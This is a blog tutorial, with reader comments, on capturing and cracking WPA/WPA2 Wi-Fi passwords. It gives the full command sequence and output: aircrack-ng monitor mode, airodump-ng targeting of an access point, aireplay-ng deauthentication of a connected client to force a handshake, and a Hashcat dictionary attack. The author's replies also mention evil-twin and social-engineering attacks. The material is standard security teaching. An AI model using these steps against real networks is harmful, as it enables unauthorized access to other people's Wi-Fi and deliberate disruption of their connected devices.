CrackingWiFiPasswords

How to Capture & Crack WPA/WPA2 Wireless Passwords

In this tutorial, I will show you how to capture and then crack WPA/WPA2  Wireless passwords. This I hope will be part of a new series of tutorials dedicated to hacking wireless networks.

The weakness in WPA/WPA2 wireless passwords is that the encrypted password is shared in what is known as a 4-way handshake. When a client authenticates to an access point the client and the access point go through a 4 step process to authenticate the user to the access point. We can then capture the password at this time and attempt to crack it.

I’ll be using the aircrack-ng suite of tools to capture the 4-way handshake\wireless password and then the power of Hashcat to crack the wireless password using the graphics card built into my laptop to speed up the whole process.

To follow along you will need:

Wireless adapter: This needs to be capable of running in monitor mode, I am currently using an Alfa AWUS036NHA USB adapter, You can purchase one of these through my Amazon affiliate link here https://amzn.to/2zOQriM  everything made from this goes back into Hemp Tutorials to help keep the lights on.

I have also had a lot of success using a TP-Link TL-WN722N https://amzn.to/2N2oaHH this is a great little dongle for the price but the Alfa is the better adapter. The main thing to look out for when buying a USB wifi adapter for hacking/Pentesting is that it’s running an Atheros chipset.

Aircrack-ng Suite: The latest version can be downloaded from https://www.aircrack-ng.org/  if you are running Kali Linux a version of the aircrack-ng suit will already be installed.

Hashcat: The latest version can be downloaded from https://hashcat.net/hashcat/ also already installed in Kali Linux but will need to install the latest drivers for your graphics card also it can’t be running in a virtual machine as you don’t get the full capabilities of the graphics card.

Monitor Mode

The first step is to change the mode of the wireless interface from the default of managed mode to monitor mode. To check which mode your wireless adapter is currently running as type iwconfig in the terminal.

$ iwconfig
wlx00c0ca84bd4a IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.

enp4s0 no wireless extensions.

wlp2s0 IEEE 802.11abgn ESSID:"HempsTutorials"
Mode:Managed Frequency:5.18 GHz Access Point: 78:3E:53:F7:2F:33
Bit Rate=300 Mb/s Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=63/70 Signal level=-47 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:41 Missed beacon:0

You can see above I have two wireless adapters in my laptop (Wlp2s0 and wlx00c0ca84bd4a) I am currently running this in Linux Mint so if you are following along and using Kali or another version of Linux these interfaces would probably be called Wlan0 and Wlan1.

Notice: I have highlighted in red the mode my wireless adapters are currently running in, these are both in the default Managed mode at the moment also wlp2s0 is associated to a wireless access point called HempsTutorials and wlx00c0ca84bd4a is not associated to any.

We use airmon-ng to change the mode of the Wireless interface into monitor mode “remember not all wireless cards can go into monitor mode so check out my recommendations of two adapters that are 100% tried and tested above”.  To start monitor mode just type airmon-ng start and the name of your wireless interface.

$sudo airmon-ng start wlx00c0ca84bd4a

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1053 avahi-daemon
1097 avahi-daemon
1098 NetworkManager
1260 wpa_supplicant
1290 dhclient

PHY Interface Driver Chipset

phy0 wlp2s0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24)
phy1 wlx00c0ca84bd4a ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.

(mac80211 monitor mode vif enabled on [phy1]wlan0mon
(mac80211 station mode vif disabled for [phy1]wlx00c0ca84bd4a)

Type iwconfig again in the terminal and you should see the mode on your chosen interface has now changed to monitor.

wlan0mon IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm 
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

To change the wireless interface back into the managed mode, just type airmon-ng stop and then the name of your wireless interface. This interface should now be called wlan0mon..

sudo airmon-ng stop wlan0mon 


PHY Interface Driver Chipset

phy1 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 station mode vif enabled on [phy1]wlan0)

(mac80211 monitor mode vif disabled for [phy1]wlan0mon)
phy0 wlp2s0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24)

If you find that later on in this tutorial your capture stops working or you can’t get it to start, you can use airmon-ng check in your terminal and it will show you any processes that could be causing issues with the aircrack-ng suite.

sudo airmon-ng check

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1053 avahi-daemon
1097 avahi-daemon
1098 NetworkManager
1260 wpa_supplicant
1290 dhclient

You could go through all these processes individually and kill them one by one, but luckily you can just run airmon-ng check kill and this will kill all conflicting processes at once.

sudo airmon-ng check kill

The aircrack-ng wiki states this should be done before putting your wireless interface into monitor mode but other guides tell you to run it after. personally, I can run the aircrack suite just fine without having to kill any process but find out what works best for you and let me know in the comments at the bottom of this tutorial.

Note: if You do run the airmon-ng check kill command you will lose your network connection as this kills the network manager, dns and the dhcp client.

Capture WPA/WPA2 Password

Now you have your Wireless adapter in monitor mode and all the processes that might affect this attack have been stopped, use airodump-ng to show all the wireless access points in range around you. Just type airodump-ng and the name of your wireless interface that you have just changed to monitor mode. In my case, “this is now called wlan0mon”.

sudo airodump-ng wlan0mon

Leave this running for a while as it picks up all the access points and wireless device you are in range of.

airodump-ng capture
airodump-ng showing APs in range

 

Basically when airodump-ng is running the top section, gives you a list of access points you are in range of and the bottom section shows you which wireless devices (Station) are connected to which access point. You need to pick an access point that has at least one device associated to it for this attack to work. Once you have found an access point in the list, make note of its BSSID and the channel, we will need these to structure our next command and start capturing the 4-way handshake.

Run airodump-ng again this time focusing the capture to a single access point, using the BSSID and Channel you just made note of and then telling airodump-ng where to save the capture file followed by the wireless interface that is already in monitor mode, as below.

sudo airodump-ng -c 6 --bssid 00:14:C1:26:47:C0 -w testhemptutorials wlan0mon

-c = Channel
--bssid = bssid of access point
-w = Output file name and location
airodump selected router
airodump-ng selected router

Leaving airodump-ng capturing data from the access point, open another terminal.

De-authenticate An Associated Device

You now need to de-authenticate one of the wireless devices that are already associated to the access point, when the de-authentication stops the wireless device will automatically re-associate with the access point allowing you the capture the 4-way handshake

To start the De-authentication we use aireplay-ng with the -0 and a number to specify how many DeaAuth packets we want to send, -a with the BSSID of the access point and -c with the MAC address of the device we want to de-authenticate.

sudo aireplay-ng -0 20 -a 00:14:C1:26:47:C0 -c 08:C5:E1:8C:03:A6 wlan0mon
21:15:32 Waiting for beacon frame (BSSID: 00:14:C1:26:47:C0) on channel 6
21:15:33 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|60 ACKs]
21:15:33 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:34 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [57|70 ACKs]
21:15:34 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [64|64 ACKs]
21:15:35 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [14|60 ACKs]
21:15:35 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|63 ACKs]
21:15:36 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:36 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|64 ACKs]
21:15:37 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|65 ACKs]
21:15:38 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:38 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|69 ACKs]
21:15:39 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:39 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|58 ACKs]
21:15:40 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|66 ACKs]
21:15:40 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:41 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|67 ACKs]
21:15:41 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|65 ACKs]
21:15:42 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|59 ACKs]
21:15:42 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:43 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|69 ACKs]

As soon as the de-authentication stops the device reconnects to the access point and we will capture the 4-way handshake. To confirm this we get a nice prompt in airodump-ng running in our other terminal. check out the top right corner that now says WPA handshake: 00:14:C1:26:47:C0.

4-way handshake
4-way handshake captured

Once you have captured the handshake, you have everything you need so you can now do ctrl + c and stop airodump_ng from running in the terminal and capturing any more data.

Crack WPA/WPA2 Password

Before you start to crack the hash its always best practice to check you have actually captured the 4-way handshake. To do this double click the .cap file created by airodump-ng in the previous steps, this should open up in Wireshark if you have it installed. Once Wireshark is loaded, just type eapol into the filter tab and you should see each of the 4 handshakes captured as below.

captured handshake
4-way handshake capture in Wireshark

To use Hashcat to crack the password you need to convert the .cap file into a .hccapx file. This is a format Hashcat understands stripping out anything it does not need from the capture. There’s two ways to do this you can either use Hashcat’s hosted service at https://hashcat.net/cap2hccapx/ where you upload your .cap file and it then allows you to download the converted .hccapx file or you can download the Hashcat tools from there GitHub page https://github.com/hashcat/hashcat-utils/ this contains the cap2hccapx, which allows you to convert the .cap files without having to upload it to any servers out of your control first.

Now we have our file that has been converted into a .hccapx its time to start cracking it with Hashcat. I use my windows laptop for this as it’s got an AMD Radeon in it, which I can use with Hashcat to speed up the whole cracking process. You can use your CPU with Hashcat if you don’t have a compatible Graphics card but it will take a hell of a lot longer to crack.

Also as I am doing a dictionary based crack on the WPA2 key you are going to need to get yourself a wordlist. If you are running Kali Linux check out  /usr/share/wordlists you should be able to find the rockyou.txt one already there. If you can’t find it or like me you are running this on something other then Kali you can download a copy of rockyou.txt from the SkullSecurity password Wiki. For this tutorial, I used a cut-down version of the rockyou.txt and made sure my password was in it saving it to a file called test.txt.

To get Hashcat working on cracking your WPA2 key type.

hashcat64.exe -m 2500 C:\location\of\hccapx\file.hccapx C:\Location\of\wordlist\test.txt

This will then quickly run through the wordlist and if it finds a match you should see something like this.

 

 

Hashcat password
WPA2 Password found in Hashcat

Ok, I know password1 is not the most secure password in the world but this access Point is only used for testing and It highlights why you should make your WiFi password more secure. Notice even with half the rockyou.txt file I was able to crack this password in around 8 seconds and probably would have been faster if I had a better graphics card.

If you have any questions about anything above or you feel I have missed something out, please leave me a comment below.

Extra Reading:

Aircrack Wiki: http://www.aircrack-ng.org/doku.php?id=airmon-ng

HashCat Wiki: https://hashcat.net/wiki/

Hemp

IT and security Expert with 20+ Years of Experience. _______________________________________________________ With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

8 thoughts on “How to Capture & Crack WPA/WPA2 Wireless Passwords

  1. So, dictionary attacks are just guess work. Like a kid trying all name combinations on his neighbour’s wi-fi. Why can’t we decrypt the handshake captured? Or is there way to do so? If we know how it works, what encryption technique it uses and have all dedicated resources, then why not reverse engineer it.

    1. Hi Ashish

      Thanks for your comment. The whole reason WPA encryption is used is because without the key, there is no easy way to decrypt the handshake. so the best option is to try and guess the key.

      The encryption before WPA was WEP and was fundamentally flawed. Using aireplay-ng you can replay ARP packets to generate new unique IVs (Initialization Vectors). In turn, aircrack-ng uses the new unique IVs to crack the WEP key without having to any brute forcing at all.

      However all is not lost if you cant crack a WPA key there is always WPS attacks like pixey dust or techniques like Evil twin where you get the target to connect to your access point and with a bit of social engineering may be able to get the target give you there Wifi password.

      Hemp

        1. lol, all the ways are difficult, as I said above there is no way to decrypt the hash without brute-forcing it unless you have access to the private key. Then you might be able to decrypt the communications. without that, you either have to attack WPS or set up an evil twin,

  2. i have a cap file but it cannot crack pls help plls reply and give me your email id i will send you .cap file so you crack for me

    1. So Ayush I could crack you cap file but i would not do it for Free, as my cracking rig costs money to run.

      Also how do i know you are doing this ethically???

      Hemp

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top